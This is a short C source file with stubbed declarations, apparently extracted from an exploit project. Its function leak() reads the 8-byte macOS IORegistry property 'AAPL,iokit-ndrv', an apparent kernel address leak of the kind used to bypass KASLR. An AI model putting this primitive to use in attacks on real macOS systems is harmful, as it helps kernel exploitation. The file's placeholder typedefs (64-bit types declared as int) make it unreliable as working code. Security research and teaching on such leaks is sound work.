
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int uint64_t ;
typedef int io_iterator_t ;
typedef int CFTypeRef ;


 scalar_t__ CFDataGetBytePtr (int ) ;
 int CFDataGetLength (int ) ;
 scalar_t__ CFDataGetTypeID () ;
 scalar_t__ CFGetTypeID (int ) ;
 int CFSTR (char*) ;
 int IORegistryEntrySearchCFProperty (int ,int ,int ,int ,int ) ;
 int IORegistryGetRootEntry (int ) ;
 int kCFAllocatorDefault ;
 int kIOMasterPortDefault ;
 int kIORegistryIterateRecursively ;
 int kIOServicePlane ;
 int printf (char*) ;

uint64_t leak(){
  io_iterator_t iter;

  CFTypeRef p = IORegistryEntrySearchCFProperty(IORegistryGetRootEntry(kIOMasterPortDefault),
                                               kIOServicePlane,
                                               CFSTR("AAPL,iokit-ndrv"),
                                               kCFAllocatorDefault,
                                               kIORegistryIterateRecursively);

  if (CFGetTypeID(p) != CFDataGetTypeID()){
    printf("expected CFData\n");
    return 1;
  }

  if (CFDataGetLength(p) != 8){
    printf("expected 8 bytes\n");
    return 1;
  }

  uint64_t leaked = *((uint64_t*)CFDataGetBytePtr(p));
  return leaked;
}
